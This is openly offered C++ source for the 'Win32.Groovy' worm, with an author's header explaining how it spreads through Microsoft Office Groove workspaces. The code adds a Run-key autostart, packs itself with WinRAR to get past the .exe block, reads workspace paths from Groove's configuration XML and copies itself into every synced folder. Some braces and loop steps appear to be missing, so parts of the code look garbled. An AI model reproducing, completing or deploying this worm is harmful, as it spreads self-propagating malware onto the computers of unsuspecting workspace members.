Win32.Groovy by free0n || Project Folder

* Win32.Groovy (01/28/2007)
* >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
* by free0n
* | DoomRiderz
* ###########################################################
* ++Groovy++
* Groovy is the first Microsoft Office Groove worm. Groove
* is a new Microsoft Office Tool that lets users share documents
* and workspaces with other team members. Now the best part
* about Groove is it "Automatically sends the changes you make
* in a workspace to your team members' computers." So naturally
* this is now a new effective spreading technique that will
* spread our worm for us and all we have to do is dump our file
* into a workspace! omg how cool!
* Now there is some minor security on this tool so no .exe's but
* we can do .zip's and .rar's so to fully exploit this little
* loophole we make our worm have the ability to rar it'self! wow
* hard stuff... the next little challenge is getting the
* the workspaces and path to them on the hard drive but once again
* Microsoft made this really easy by creating us an XML file!
* so now we can just parse the xml file and get the all the
* paths to copy our worm. Then once the worm is copied to the folder
* almost instantly Microsoft Groove will alert all the members
* of the workspace and download the worm to their computers.
* Pretty cool right?!
* So let the fun begin on hacking this cool tool. This worm
* is not violent with no destructive payloads and no real
* defence against a.v. but since this is like a P.O.C. it
* shouldn't matter. I'm not out to destroy the world anyways
* just the only p.c. that matters (mine) hehe :)
* >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
#include <cstdlib>
#include <iostream>
#include <windows.h>
#include <string.h>
#include <stdlib.h>
#include <tlhelp32.h>
#include <fstream>

using namespace std;

//the cooolest way to startup
void AutoRun(string path)
    HKEY hKey;
    RegCreateKey(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", &hKey);
    RegSetValueEx(hKey, "Groovy", 0, REG_SZ, (BYTE *)path.c_str(), lstrlen(path.c_str())+1);

//winrar our file up basically
//grabs the winrar path from the registry
//then executes our rar parameters and
//creates a archive for us.
void WinRaR(string path)
    HKEY hKey;
    HWND hwnd;
    string rarKey = "Software\Microsoft\Windows\CurrentVersion\App Paths\WinRAR.exe";
    unsigned char rar[1024];
    DWORD rarlen = sizeof(rar);
    char rarPath[MAX_PATH];
    if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,rarKey.c_str(),0,KEY_QUERY_VALUE,&hKey) == ERROR_SUCCESS)
        //remember kids always close anything u open
        //it's like when u get married you have to make sure
        //u always put the lid down after goin tinkle
        //else youre wife will cut ur u know whats off
        int i = 0;
        while(rar[i] != 0) {
            rarPath[i] = rar[i];
        ShellExecute(hwnd,"open",rarPath,"a groovy.rar *.exe",NULL,SW_HIDE);
        //calling winrar like this is dumb but since we do it, we have
        //to give the program some time to execute and complete
        clock_t goal = 10000 + clock();
        while (goal > clock());

//duh guess what these next two
//functions do :)
bool FileExists(string n)
    ifstream groovy(n.c_str());
    return groovy.is_open();

string ReplaceAll(string s, string f, string r) {
    unsigned int found = s.find(f);
    while(found != string::npos) {
        s.replace(found, f.length(), r);
        found = s.find(f);
    return s;

char *AppDataDir()
    //hack our shell folders and grab our application data path
    //never do that lame hard coding drive shit that's dumb.
    HKEY hKey;
    char *appKey = ".DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders";
    unsigned char appData[1024];
    DWORD appLen = sizeof(appData);
    char appPath[MAX_PATH];
    if(RegOpenKeyEx(HKEY_USERS,appKey,0,KEY_QUERY_VALUE,&hKey) == ERROR_SUCCESS)
        RegQueryValueEx(hKey,"Local AppData",0,NULL,appData,&appLen);
        int i = 0;
        while(appData[i] != 1) {
    return appPath;

//holy mother of god!
//string manipulation is horrible in C/C++
//and the fact i'm not good at it doesn't help
//but it works....
//basically opens our passed in xml file
//string tokens based on " " then we save
//all the lines that have RootFolderPath into another
//string.  then we use that replace all method
//to replace those 2 strings and that gives us
//our filepaths with a delimiter of a double quote "
string ParsePaths(string path)
    string line;
    ifstream grooveyFile (path.c_str());
    char findchar = '_';
    string paths = "";
            if(line.length() > 0 || line != "")
                int i = 0;
                char str[line.length()];
                while(line.length() != i)
                    str[i] = line[i];
                char* rfp;
                rfp = strtok(str," ");
                while (rfp != NULL)
                    paths += rfp;
                    rfp = strtok (NULL, " ");
        if(paths.length() > 0 || paths != "")
            //this will give us our paths in one string
            //we will leave a double quote " there to use
            //as our maker then later will just use strtok to
            //grab the paths. easy cheezy :)
            paths = ReplaceAll(paths,"_OrigRootFolderPath="","");
            paths = ReplaceAll(paths,"_RootFolderPath="","");
    return paths;

//we pass in our rar file and our filepaths string
//that was returned from the method above this one
//looks like this C:fasm"C:test"C:blah" since
//our double quote is our delimiter we can use strtok
//again to get the paths to copy from one by one.
void Spread(string file, string filepaths)
    int i = 0;
    char str[filepaths.length()];
    while(filepaths.length() != i)
        str[i] = filepaths[i];
    char* fxs;
    fxs = strtok(str,""");
    while (fxs != NULL)
            string p = "";
            p += fxs;
            char* l = strrchr(fxs,'\');
            if(strlen(fxs) == (l-fxs+1))
                p += file;
        fxs = strtok(NULL, """);

void Payload()
    SYSTEMTIME time;
    //happy 420! i did this for all the people that
    //go to hippy hill in San Francisco, hopefully
    //you'll be there and not get this message
    //but if you do, then just go to the park and groove
    //out to some greatful dead and pass some joints  :)
    //I remember how much fun it was to be out there and i miss it sooo bad :)
    //great people and great fun! do it if you ever get a chance
    if(time.wDay == 20 && time.wMonth == 4)
        MessageBox(NULL,"Infected with the first Groove worm. Don't worry nothin bad happend. Isn't it just groooovy! :)","Grooovy by free0n [DoomRiderz]",MB_OK);
    if(time.wDay == 16 && time.wMonth == 9)
        //A sPecial Secret Message for Someone on this Day
        MessageBox(NULL,"Help sAve PeoPle other than Yourself - Burn Down the Angelic evils that haunt You","Grooovy by free0n [DoomRiderz]",MB_OK);

//main program execution
//works like this
//1. gets our path
//2. gets our xml path that stores all the groove repositories
//   the groove repositories will be our destination folders for copying our worm
//3. if xml file exists then get repositories and continue
//4. Create a directory and dump a copy of ourself in it
//5. Add the copy to the auto startup
//6. If WinRaR is on the system then RaR up the directory with our .exe and continue
//7. Check to see if we got any repository paths, if we do then copy our rar file to
//   those paths and continue
//8. Delete our rar file cause that would have been created in our main app directory
//9. Then run our msgbox payload

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil)
    char me[MAX_PATH];
    string groovey = strcat(AppDataDir(),"\Groovy");
    groovey += "\groovy.exe";
        //spread using ms office groove
        string path = strcat(AppDataDir(),"\Microsoft\Office\Groove\User\GFSConfig.xml");
        string groovePaths = ParsePaths(path);
        if(groovePaths.length() > 0)
                Spread("groovy.rar", groovePaths);
    return 0;